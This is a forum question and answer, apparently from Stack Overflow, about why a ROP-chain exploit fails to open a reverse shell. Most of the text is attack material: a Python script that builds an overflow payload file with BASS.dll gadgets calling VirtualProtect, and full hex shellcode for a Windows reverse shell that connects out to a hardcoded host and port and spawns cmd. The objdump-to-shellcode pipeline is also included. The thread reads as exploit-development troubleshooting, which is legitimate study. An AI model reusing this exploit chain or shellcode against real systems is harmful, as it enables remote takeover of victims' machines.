I am trying to create a reverse shell using ROP chains by injecting the objdump from the .obj but it does not connect
So basically the problem is as follows:
I have written a ROP chain that calls shellcode from the stack. The ROP chain has also been tested with simple shellcode to call a calculator and it works. This is the code which is generating the payload.wax:

import struct

def create_buffer(buffer_value, buffer_size):
    # Erstellt ein Byte-Array der Größe 'size' und füllt es mit dem Wert buffer_value
    array = [buffer_value] * buffer_size
    buffer = bytearray(array)
    return buffer


def generate_rop_gadget(gadget_address):
    # Packt die Adresse des ROP-Gadgets in eine Byte-Sequenz
    return struct.pack('<I', gadget_address)  # '<I' für little-endian 32-bit unsigned int


def create_rop_chain(gadget_addresses):
    # generiert eine ROP-Kette, indem sie die Adressen der ROP-Gadgets in der übergebenen Liste von gadget_addresses verarbeitet
    return b''.join(generate_rop_gadget(address) for address in gadget_addresses)

########VALUES########

buffer_size = 1012  # 1012 bytes
buffer_value = 97  # ASCII 'a'
gadget_addresses = [
    # [---INFO:gadgets_to_set_esi:---]
    0x10015f77,  # POP EAX # RETN [BASS.dll]
    0x10040284,  # ptr to &VirtualProtect() [IAT BASS.dll]
    0x1001eaf1,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [BASS.dll]
    0x10030950,  # XCHG EAX,ESI # RETN [BASS.dll]
    # [---INFO:gadgets_to_set_ebp:---]
    0x1001d892,  # POP EBP # RETN [BASS.dll]
    0x10022aa7,  # & jmp esp [BASS.dll]
    # [---INFO:gadgets_to_set_ebx:---]
    0x10015f82,  # POP EAX # RETN [BASS.dll]
    0xfffffdff,  # Value to negate, will become 0x00000201
    0x10014db4,  # NEG EAX # RETN [BASS.dll]
    0x10032f32,  # XCHG EAX,EBX # RETN 0x00 [BASS.dll]
    # [---INFO:gadgets_to_set_edx:---]
    0x10015f82,  # POP EAX # RETN [BASS.dll]
    0xffffffc0,  # Value to negate, will become 0x00000040
    0x10014db4,  # NEG EAX # RETN [BASS.dll]
    0x10038a6c,  # XCHG EAX,EDX # RETN [BASS.dll]
    # [---INFO:gadgets_to_set_ecx:---]
    0x106040c0,  # POP ECX # RETN [BASSMIDI.dll]
    0x10108aec,  # &Writable location [BASSWMA.dll]
    # [---INFO:gadgets_to_set_edi:---]
    0x1001621c,  # POP EDI # RETN [BASS.dll]
    0x1001dc05,  # RETN (ROP NOP) [BASS.dll]
    # [---INFO:gadgets_to_set_eax:---]
    0x10015f82,  # POP EAX # RETN [BASS.dll]
    0x90909090,  # nop
    # [---INFO:pushad:---]
    0x1001d7a5,  # PUSHAD # RETN [BASS.dll]
]


# Nops zum Auffüllen des Speichers zwischen dem Buffer und dem Shellcode
nops = b"\x90" * 16

# Shellcode
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x1a" -f raw
buf = b"YOUR SHELLCODE"

# Main
if __name__ == "__main__":
    buffer = create_buffer(buffer_value, buffer_size)
    #print(buffer)
    print(f"Buffer size: {len(buffer)} bytes")
    rop_chain = create_rop_chain(gadget_addresses)
    print(f"ROP chain size: {len(rop_chain)} bytes")
    
    
    payload = buffer + rop_chain + nops + buf
    print(f"Payload size: {len(payload)} bytes")
    with open("payload.wax", "wb") as f:
        f.write(payload)
        print("Payload written to 'payload.wax'")


Now I have an ASM script that creates a reverse shell. If I compile the script and run it as .exe, it works and I get a connection. Now I want to execute this ASM script as shellcode and have proceeded as follows:
nasm -f win32 test.asm
which creates the test.obj and then:
objdump -d test.obj | grep -Po '\s\K[a-f0-9]{2}(?=\s)' | sed 's/^/\\x/g' | perl -pe 's/\r?\n//' | sed 's/$/\n/'
which gave me the shellcode:
\x31\xc9\xf7\xe1\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x25\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x25\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x25\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x89\xd5\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd2\x68\x33\x32\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x77\x73\x32\x5f\x54\xff\xd0\x89\xc6\x68\x75\x70\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x56\xff\xd5\x31\xd2\x66\xba\x90\x01\x29\xd4\x54\x52\xff\xd0\x68\x74\x41\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x54\x56\xff\xd5\x31\xd2\x52\x52\x52\xb2\x06\x52\x80\xea\x05\x52\x42\x52\xff\xd0\x50\x5f\x68\x65\x63\x74\x61\x66\x83\x6c\x24\x03\x61\x68\x63\x6f\x6e\x6e\x54\x56\xff\xd5\xba\xc1\xa9\x01\x69\x81\xea\x01\x01\x01\x01\x52\x66\x68\x11\x5c\x31\xd2\xb2\x02\x66\x52\x89\xe2\x6a\x10\x52\x57\xff\xd0\x31\xc9\x68\x73\x41\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x54\x53\xff\xd5\x89\xde\x68\x63\x6d\x64\x61\x66\x83\x6c\x24\x03\x61\x89\xe3\x57\x57\x57\x31\xff\x6a\x12\x59\x57\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\xc6\x44\x24\x10\x44\x8d\x4c\x24\x10\x54\x51\x57\x57\x57\x47\x57\x4f\x57\x57\x53\x57\xff\xd0\x83\xc4\x10\x68\x65\x73\x73\x61\x66\x83\x6c\x24\x03\x61\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x56\xff\xd5\x31\xc9\x51\xff\xd0

If I now add this to the Python file to generate payload.wax, the payload,wax does not create a reverse shell when executed.
What is the reason for this?
I also made the objdump from the exe file and it did not work when injecting as payload.wax. The exe file without injecting or without objdump normally establishes a connection to the reverse server.

The ROP chain seems correct (if the addresses used are), the shellcode itself is too long to tell, tough. Use a debugger. You can either add a int3 instruction to trigger the debug or follow the rop chain. Make sure your shellcode is correctly loaded and executed, then single step through it and see what's wrong.

@MargaretBloom thanks for the comment. I did another objdump on the test.exe and it worked. The problem was that the test.obj was not linked correctly
